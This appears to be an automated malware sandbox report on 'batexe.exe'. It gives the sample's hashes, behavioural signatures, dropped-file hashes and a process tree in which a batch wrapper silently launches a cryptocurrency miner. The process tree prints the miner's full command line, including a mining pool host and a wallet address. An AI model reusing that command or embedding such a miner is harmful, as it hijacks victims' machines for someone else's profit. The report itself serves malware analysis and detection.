Analysis
-
max time kernel
295s -
max time network
304s -
platform
windows10-1703_x64 -
resource
win10-20240221-ja -
resource tags
arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
24/02/2024, 13:09
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4352 b2e.exe 4556 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4556 cpuminer-sse2.exe 4556 cpuminer-sse2.exe 4556 cpuminer-sse2.exe 4556 cpuminer-sse2.exe 4556 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/3444-5-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3444 wrote to memory of 4352 3444 batexe.exe 75 PID 3444 wrote to memory of 4352 3444 batexe.exe 75 PID 3444 wrote to memory of 4352 3444 batexe.exe 75 PID 4352 wrote to memory of 4704 4352 b2e.exe 76 PID 4352 wrote to memory of 4704 4352 b2e.exe 76 PID 4352 wrote to memory of 4704 4352 b2e.exe 76 PID 4704 wrote to memory of 4556 4704 cmd.exe 79 PID 4704 wrote to memory of 4556 4704 cmd.exe 79
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Users\Admin\AppData\Local\Temp\801D.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\801D.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\801D.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\82DC.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4556
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.9MB
MD59a99034eda6fbfd94ee3fc215c0d3c50
SHA182b8652ab4e665d4a4120a912421d9e68e973970
SHA256382dfd4d162551b0228027f4c317bd957a4d50889b27b583f42dc60be3c71098
SHA512ec15784c8048aa377461a4743dd056aded45d125c5309823d726a7eebb7ba66ef6c0295ec98bf3d613641c89b920037f7c0a25ccd44769c126db1b62743d45a1
-
Filesize
4.1MB
MD555075aad2654558e78c79389d328bd6c
SHA13c49741995c4eedb25ab33cc269abeed7e5a00b8
SHA256778ee0f65897dd81fdfe44499a01fd879b1c237acb9015a4b8afe1020809e440
SHA5120060002f1ddd8ba3d108c627afb31818998a107e866db7bf1de6ce534e4974c520e8a4a34a0925c1ecac868c5f85543afd169b1ad77b81521b88049bf784ec5f
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.5MB
MD59d2ee50118f49e3c1581213447f1a151
SHA1f5c1f533a33a27ced49b0b1eecd2b5de547286e3
SHA25682ddc758771b79dd62d538db1d56e0d7f5425c4cb54650561dd252e20f63710e
SHA5125e87a636ea9a1ceaec559765c8529e8021b20bdd461802d7e40987bd57a6bd26e5a60fdac2ce6287e3e3beeb22e7f5298a90ee5f71ab9415f12909d10b2717fe
-
Filesize
1.5MB
MD5ef9a85da8520caa2afa0a147feaa89fa
SHA1093d191bdb82a50e93a5e2d46f497f15eb0985f4
SHA256b1ea18390e23103e899587db5de3ff2be2fe9ea9cd1535f32271fc420fa3e582
SHA5126ecae0e73ad3ee1ac49a74bf164a3ce19569d5a9bcc200caf868807c01dd96cafaa0c9e612e5fb45b64fa07e57ee9930175fbb9a068f915be1b6b2bf01902675
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.5MB
MD55e5e00bbf5417f39f1571678b70c38e3
SHA1c46078a57cab89a887f11b4e3c3945d86f2b7930
SHA256a39df1d4279923c1907283035ba8e7dda7172a2ef604558bd27fbe96c79b244a
SHA51293910b727986e0b8dacd2e1ebef4e6e4eb737988f5d551987afe0c9a6879d55198ca21b5a5e3a62119b9ccbc8393b870e2118357c22544b096b199b8a4baaacb
-
Filesize
1.4MB
MD5a6658daced4899f6f5638cc039ef6f10
SHA1c18d0188ce340d7f11eb76da20f92754c1558b30
SHA256872ef3e720ed14edeff34861aaca5cfbeef092bde02ee5e20a0cce9b5e03c2bb
SHA51209ebee84693f54545e7e3658f4e96654618f52fee85a89d26eb57ef403bdfeaec791441c0a6600220f137c770e4d74f55267d756d7113cad91f36fb6657a0d31
-
Filesize
1.1MB
MD5799d3c24a4a181fef5c81ff448d54ca8
SHA14d78bf61e271fee37f496e5b27d98b4003d6f7f1
SHA25649087555ba33ec28799185c3af8f2fe87c0519ce6b74fbfcd6fee01360cf6d73
SHA512422485b12dcd6d9cab0fb589f013f98c5b144de14b6e07af756cb0d6970be8b090e44dd143cf0a3d09e50d4f06d9c68a39a1f3c5241b624446fe1e2ee181cae5
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770